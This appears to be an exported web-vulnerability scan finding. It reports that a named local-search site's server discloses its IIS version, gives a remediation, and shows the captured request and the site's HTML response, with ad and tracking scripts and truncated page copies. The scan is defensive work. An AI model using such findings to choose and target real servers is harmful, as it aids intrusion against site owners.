<table cellspacing="0" cellpadding="0" border="0" width="950" style="margin-left: auto; margin-right: auto; postion: relative;">

<tr>
<td valign="top" width="100%" colspan="3">
<!-- Begin Header -->
<table cellpadding="0" cellspacing="0">
<tr>
<td id="tlHead">
<div id="headFlashBlock" style="width: 350px; height: 85px; z-index: 0;"><div style="width: 500px; height: 85px; background-image: url(/images/backup_logo.png); background-repeat: no-repeat;"></div></div>
</td>
<td id="trHead" style="width: 598px; text-align: right; padding-right: 10px;">
<table style="float:right">
<tr>
<td>&nbsp;

<script type="text/javascript">
GA_googleFillSlot("hellonetwork_header");
</script>

</td>
</tr>
</table>
</td>
</tr>

<tr>
<td colspan="2" style="background-color: white; padding-left: 9px; border-right: solid 1px green;">
<ul id="nav">
<li class="mainNav"><a class="mainNav" href="/index.cfm">Home</a>
</li>
<li class="mainNav"><a class="mainNav" href="/neighborhoods.cfm">Neighborhoods</a></li>
<li class="mainNav"><a class="mainNav" href="/zipcodes.cfm">ZIP Codes</a></li>
</ul>
</td>
</tr>

</table>

<script type="text/javascript">
var headLogo = { movie:"/flash/HelloLocalLogoFade_nl.swf?varCityName=Network&EndofCity=26", width:"350", height:"85", majorversion:"6", build:"40", wmode:"transparent" };
UFO.create(headLogo, "headFlashBlock");
</script>

<!-- End Header -->
</td>
</tr>
<tr>
<td colspan="3" valign="top">
<div style="background-color: white; border-left: solid 2px #313260; border-right: solid 2px #313260; position: relative; height: 15px; width: 946px; background-image: url(/styles/images/header/underNavShadow.jpg); background-repeat: repeat-x;"><br />
</div>
<table border="0" cellspacing="0" cellpadding="0" width="100%" id="contentTable" summary="">
<tr>
<td rowspan="4" id="leftBg"></td>
<td valign="top" id="mainContent">



<div style="padding-left:10px;">
<h1 style="text-transform: capitalize;">credit monitoring listings in Dallas, Texas</h1>
<h2 style="text-transform: capitalize;">Use the map to find the closest credit monitoring listings near you</h2>
</div>



<script type="text/javascript" charset="utf-8">
var pageOptions = {
'pubId' : 'pub-8011115638404408',
'query' : 'credit monitoring',
'channel' : '3788747813',
'hl' : 'en'
};

var adblock1 = {
'container' : 'adblock1',
'width' : 'auto',
'lines' : '3',
'number' : '4',
'fontFamily' : 'arial',
'fontSizeTitle' : '16px',
'fontSizeDescription' : '12px',
'fontSizeDomainLink' : '12px',
'colorTitleLink' : '#0B0B8F',
'colorText' : '#000000',
'colorDomainLink' : '#0B0B8F'
};

var adblock2 = {
'container' : 'adblock2',
'width' : 'auto',
'lines' : '3',
'number' : '5',
'fontFamily' : 'arial',
'fontSizeTitle' : '16px',
'fontSizeDescription' : '12px',
'fontSizeDomainLink' : '12px',
'colorTitleLink' : '#FF5C00',
'colorText' : '#000000',
'colorDomainLink' : '#000000'
};

new google.ads.search.Ads(pageOptions, adblock1, adblock2);
</script>



<style type="text/css">
.sponsored_listing .name {
font-weight: bold;
color: blue;
text-decoration: underline;
}
.sponsored_listing .teaser {
color: black;
text-decoration: none;
}
.sponsored_listing .website_link {
color: green;
font-size: 11px;
}
.sponsored_listing {
padding-bottom: 10px;
margin-bottom: 10px;
border-bottom: solid 1px gray;
}
</style>
<table width="935">
<tr>
<td colspan="3">
<div class="searchBox" style="margin-left: 5px; height: 50px; background-color: #2E841F; background-image: url(/images/search_bg.png);"> <form name="ypsearch" id="ypsearch" action="/local_yellow_page_search.cfm" method="GET" style="font-size: 21px; font-weight: bold;"> <table style="margin-top: 12px; margin-left: 10px;"> <tr> <td> <span class="mainSearch">Find</span> <input name="kw" id="kw" type="text" value="credit monitoring" style="padding-left: 5px; width: 200px; height: 16px; font-size: 14px; font-weight: bold; text-transform: Capitalize;" /> <span class="mainSearch">Near</span> <input name="location" id="location" type="text" value="Dallas, TX" style="padding-left: 5px; width: 200px; height: 16px; font-size: 14px; font-weight: bold; text-transform: Capitalize;" /> <input type="hidden" id="tt" name="tt" value="hlgpage" /> </td> <td style="padding-left: 10px;"> <input type="submit" value="Search Local" /> </td> </tr> </table> </form> </div>
</td>
</tr>
<tr>
<td width="220">


<div style="padding-left: 5px;">



<div class="filterBoxClone" style="background-color: #EDF5FF;">
<h2 style="margin-top: 2px; text-align: left;">Related Searches</h2> <div style="padding-top: 10px; text-align: left;"> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring&t=rel" style="text-transform: capitalize;">credit monitoring</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20services&t=rel" style="text-transform: capitalize;">credit monitoring services</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20review&t=rel" style="text-transform: capitalize;">credit monitoring review</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20citi&t=rel" style="text-transform: capitalize;">credit monitoring citi</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20companies&t=rel" style="text-transform: capitalize;">credit monitoring companies</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20agencies&t=rel" style="text-transform: capitalize;">credit monitoring agencies</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20worth%20it&t=rel" style="text-transform: capitalize;">credit monitoring worth it</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20consumer%20reports&t=rel" style="text-transform: capitalize;">credit monitoring consumer reports</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20company&t=rel" style="text-transform: capitalize;">credit monitoring company</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> &l..
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /ypsearch.cfm

/ypsearch.cfm

http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264

Extracted Version

Microsoft-IIS/7.5

Request

GET /ypsearch.cfm?kw=credit%20monitoring&KID=29264 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.hellonetwork.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: IPCITYNAME=Dallas;expires=Tue, 16-Apr-2041 20:06:19 GMT;path=/,IPCITYSTATE=TX;expires=Tue, 16-Apr-2041 20:06:19 GMT;path=/,IPCITYZIP=75207;expires=Tue, 16-Apr-2041 20:06:19 GMT;path=/,SEARCHKEYWORD=credit%20monitoring;path=/,AFSCHANNEL=3788747813;path=/
Date: Sun, 24 Apr 2011 20:06:19 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>


<script type="text/javascript">
window.google_analytics_uacct = "UA-350746-14";
</script>

<title>credit monitoring in Dallas, TX Local Search Results</title>



<script src="http://www.google.com/jsapi"> </script>
<script type="text/javascript" charset="utf-8">
google.load('ads.search', '2');
google.load('jquery', '1.4');
</script>

<script type="text/javascript">

jQuery(function( $ ){
var isOverGoogleAd = false;
$( "iframe[ id *= google ]" )
.mouseover(
function(){
isOverGoogleAd = true;
}
)
.mouseout(
function(){
isOverGoogleAd = false;
}
)
;
$( window ).blur(
function(){
if (isOverGoogleAd){
$('#asftrack').html('<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1053332784/?value=1.0&amp;label=2uiYCKyIpAIQsKqi9gM&amp;guid=ON&amp;script=0"/>');
}
}
)
.focus();
});

</script>


<script language="JavaScript" type="text/javascript">
function beenClicked(marker) {
var theImage = document.getElementById('converter');
theImage.src = marker;
}
function altBeenClicked(marker) {
var theImage = document.getElementById('altconverter');
theImage.src = marker;
}
function altBeenClickedTwo(marker) {
var theImage = document.getElementById('altconvertertwo');
theImage.src = marker;
}
function trackit() {
var objFrame=document.getElementById("placeholder");
objFrame.src="/click.html";
}

function trackrbl() {
pageTracker._trackPageview('/track/rbl/');
}

function trackquigo() {
pageTracker._trackPageview('/track/quigo/');
var theImage = document.getElementById('converter');
theImage.src = "https://mv.bidsystem.com/ppc/sendtracker.aspx?c=208596&conversion=1&w=p3p&cb=5B32ACC9-A7B7-744C-63502FCFAD1B7D62&u=c22f0e8e-f312-43e6-994c-526c659b5b6d";
}

function trackrl() {
pageTracker._trackPageview('/track/rl/');
beenClicked('http://www.googleadservices.com/pagead/conversion/1071721528/?label=2omWCKGgPxC42IT_Aw&script=0');
}

function ct(c,s,t,r,p) {
var ctrackFrame=document.getElementById("ctrack");
ctrackFrame.src="/t.cfm?c=" + c + "&s=" + s + "&t=" + t + "&r=" + r + "&p=" + p;

}

var cc = 0;
function cti(c,s,t,r,p,k) {
pageTracker._trackPageview('/vz/track');
var ctrackFrame=document.getElementById("ctrack");
ctrackFrame.src="/ti.cfm?c=" + c + "&s=" + s + "&t=" + t + "&r=" + r + "&p=" + p + "&k=" + k;
//cc = cc + 1;
//if (cc == 1) {
// $('.verizon_block').hide();
//}
}

function itrack() {

}

function sponsored_tracking_112() {

}

/* JavaScript for click tracking verizon */

function ctv(c,s,t,r,p,k,a) {
pageTracker._trackPageview('/idearc');
$('#cBlock').load("/tv.cfm?c=" + c + "&s=" + s + "&t=" + t + "&r=" + r + "&p=" + p + "&k=" + k + "&a=" + escape(a.href));
var theImage = document.getElementById('converter');
theImage.src = 'http://www.googleadservices.com/pagead/conversion/1071721528/?label=gGSYCN2gPxC42IT_Aw&script=0';
}
function ctvp(c,s,t,r,p,k,a) {
pageTracker._trackPageview('/idearc');
}



function doPhoneLink(clickUrl, suffix) {
var rtn = true;
if(showObject('phoneLabel'+suffix)) {
rtn = false;
hideObject('phoneLink'+suffix);
showObject('phoneLabel'+suffix);
if(clickUrl) {
logClick(clickUrl);
}
}
return rtn;
}

function doEmailLink(clickUrl, suffix) {
var rtn = true;
if(showObject('emailLabel'+suffix)) {
rtn = false;
hideObject('emailLink'+suffix);
showObject('emailLabel'+suffix);
if(clickUrl) {
logClick(clickUrl);
}
}
return rtn;
}

function getObject(objID) {
if (document.all) {
var obj = document.all[objID];
} else if (document.getElementById) {
var obj = document.getElementById(objID);
}
return obj;
}

function hideObject(objID) {
var obj = getObject(objID);
var rtn = false;
if (obj != null) {
obj.style.display = "none";
rtn = true;
}
return rtn;
}

function showObject(objID) {
var obj = getObject(objID);
var rtn = false;
if (obj != null) {
obj.style.display = "inline";
rtn = true;
}
return rtn;
}

function logClick(clickUrl) {
var img = new Image();
img.src = clickUrl;
}

</script>

<script type="text/javascript" src="/scripts/SICtree/ajax.js"></script><script type="text/javascript" src="/ajax/getAd.js"></script>

<script type="text/javascript" src="/scripts/ufo.js"></script>
<script type="text/javascript" src="/scripts/swfobject.js"></script>

<link href="/inc/css/styles.css" rel="stylesheet" type="text/css" media="all">

<style type="text/css" media="screen">
@import url(/styles/base.css);
</style>
<style type="text/css" media="screen">
@import url(/styles/headerNav.css);
</style>
<style type="text/css" media="screen">
@import url(/css/default.css);
</style>
<style type="text/css" media="print">
@import url(/styles/printStyle.css);
</style>
<style type="text/css" media="screen">
@import url(/styles/nav.css);
</style>
<style type="text/css">

</style>
<script src="/scripts/standard_ui.js" type="text/javascript" language="javascript"></script>
<link rel="SHORTCUT ICON" href="/favicon.ico">

<script type="text/javascript">
window.google_analytics_uacct = "UA-350746-16";
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAxlNjcILiMUNra09cJ_A5shTJTasaZLGu-S0MxpFJaRF7NywsZRSBRU3tj6CuxjTTjBB8JFKkUFVXXA" type="text/javascript"></script>




<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8011115638404408");
GS_googleEnableAllServices();
</script>
<script type="text/javascript">
GA_googleAddAttr("Domain", "hellolocal");
GA_googleAddAttr("Keyword", "credit_monitoring");
</script>
<script type="text/javascript">

GA_googleAddSlot("ca-pub-8011115638404408", "hellonetwork_header");

GA_googleAddSlot("ca-pub-8011115638404408", "hellonetwork_search_bottom_left");

</script>
<script type="text/javascript">
GA_googleFetchAds();
</script>

</head>

<body style="background-color: #727BAC; margin-top: 0px; padding-top: 0px;" onload="" onunload="">
<div id="wrapper">

<a name="top"></a>

<div id="bodyContent">

<table cellspacing="0" cellpadding="0" border="0" width="950" style="margin-left: auto; margin-right: auto; postion: relative;">

<tr>
<td valign="top" width="100%" colspan="3">
<!-- Begin Header -->
<table cellpadding="0" cellspacing="0">
<tr>
<td id="tlHead">
<div id="headFlashBlock" style="width: 350px; height: 85px; z-index: 0;"><div style="width: 500px; height: 85px; background-image: url(/images/backup_logo.png); background-repeat: no-repeat;"></div></div>
</td>
<td id="trHead" style="width: 598px; text-align: right; padding-right: 10px;">
<table style="float:right">
<tr>
<td>&nbsp;

<script type="text/javascript">
GA_googleFillSlot("hellonetwork_header");
</script>

</td>
</tr>
</table>
</td>
</tr>

<tr>
<td colspan="2" style="background-color: white; padding-left: 9px; border-right: solid 1px green;">
<ul id="nav">
<li class="mainNav"><a class="mainNav" href="/index.cfm">Home</a>
</li>
<li class="mainNav"><a class="mainNav" href="/neighborhoods.cfm">Neighborhoods</a></li>
<li class="mainNav"><a class="mainNav" href="/zipcodes.cfm">ZIP Codes</a></li>
</ul>
</td>
</tr>

</table>

<script type="text/javascript">
var headLogo = { movie:"/flash/HelloLocalLogoFade_nl.swf?varCityName=Network&EndofCity=26", width:"350", height:"85", majorversion:"6", build:"40", wmode:"transparent" };
UFO.create(headLogo, "headFlashBlock");
</script>

<!-- End Header -->
</td>
</tr>
<tr>
<td colspan="3" valign="top">
<div style="background-color: white; border-left: solid 2px #313260; border-right: solid 2px #313260; position: relative; height: 15px; width: 946px; background-image: url(/styles/images/header/underNavShadow.jpg); background-repeat: repeat-x;"><br />
</div>
<table border="0" cellspacing="0" cellpadding="0" width="100%" id="contentTable" summary="">
<tr>
<td rowspan="4" id="leftBg"></td>
<td valign="top" id="mainContent">



<div style="padding-left:10px;">
<h1 style="text-transform: capitalize;">credit monitoring listings in Dallas, Texas</h1>
<h2 style="text-transform: capitalize;">Use the map to find the closest credit monitoring listings near you</h2>
</div>



<script type="text/javascript" charset="utf-8">
var pageOptions = {
'pubId' : 'pub-8011115638404408',
'query' : 'credit monitoring',
'channel' : '3788747813',
'hl' : 'en'
};

var adblock1 = {
'container' : 'adblock1',
'width' : 'auto',
'lines' : '3',
'number' : '4',
'fontFamily' : 'arial',
'fontSizeTitle' : '16px',
'fontSizeDescription' : '12px',
'fontSizeDomainLink' : '12px',
'colorTitleLink' : '#0B0B8F',
'colorText' : '#000000',
'colorDomainLink' : '#0B0B8F'
};

var adblock2 = {
'container' : 'adblock2',
'width' : 'auto',
'lines' : '3',
'number' : '5',
'fontFamily' : 'arial',
'fontSizeTitle' : '16px',
'fontSizeDescription' : '12px',
'fontSizeDomainLink' : '12px',
'colorTitleLink' : '#FF5C00',
'colorText' : '#000000',
'colorDomainLink' : '#000000'
};

new google.ads.search.Ads(pageOptions, adblock1, adblock2);
</script>



<style type="text/css">
.sponsored_listing .name {
font-weight: bold;
color: blue;
text-decoration: underline;
}
.sponsored_listing .teaser {
color: black;
text-decoration: none;
}
.sponsored_listing .website_link {
color: green;
font-size: 11px;
}
.sponsored_listing {
padding-bottom: 10px;
margin-bottom: 10px;
border-bottom: solid 1px gray;
}
</style>
<table width="935">
<tr>
<td colspan="3">
<div class="searchBox" style="margin-left: 5px; height: 50px; background-color: #2E841F; background-image: url(/images/search_bg.png);"> <form name="ypsearch" id="ypsearch" action="/local_yellow_page_search.cfm" method="GET" style="font-size: 21px; font-weight: bold;"> <table style="margin-top: 12px; margin-left: 10px;"> <tr> <td> <span class="mainSearch">Find</span> <input name="kw" id="kw" type="text" value="credit monitoring" style="padding-left: 5px; width: 200px; height: 16px; font-size: 14px; font-weight: bold; text-transform: Capitalize;" /> <span class="mainSearch">Near</span> <input name="location" id="location" type="text" value="Dallas, TX" style="padding-left: 5px; width: 200px; height: 16px; font-size: 14px; font-weight: bold; text-transform: Capitalize;" /> <input type="hidden" id="tt" name="tt" value="hlgpage" /> </td> <td style="padding-left: 10px;"> <input type="submit" value="Search Local" /> </td> </tr> </table> </form> </div>
</td>
</tr>
<tr>
<td width="220">


<div style="padding-left: 5px;">



<div class="filterBoxClone" style="background-color: #EDF5FF;">
<h2 style="margin-top: 2px; text-align: left;">Related Searches</h2> <div style="padding-top: 10px; text-align: left;"> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring&t=rel" style="text-transform: capitalize;">credit monitoring</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20services&t=rel" style="text-transform: capitalize;">credit monitoring services</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20review&t=rel" style="text-transform: capitalize;">credit monitoring review</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20citi&t=rel" style="text-transform: capitalize;">credit monitoring citi</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20companies&t=rel" style="text-transform: capitalize;">credit monitoring companies</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20agencies&t=rel" style="text-transform: capitalize;">credit monitoring agencies</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20worth%20it&t=rel" style="text-transform: capitalize;">credit monitoring worth it</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20consumer%20reports&t=rel" style="text-transform: capitalize;">credit monitoring consumer reports</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring%20company&t=rel" style="text-transform: capitalize;">credit monitoring company</a><br /> </div> <div style="display: block; position: relative; margin-bottom: 4px;"> <a href="/ypsearch.cfm?kw=credit%20monitoring..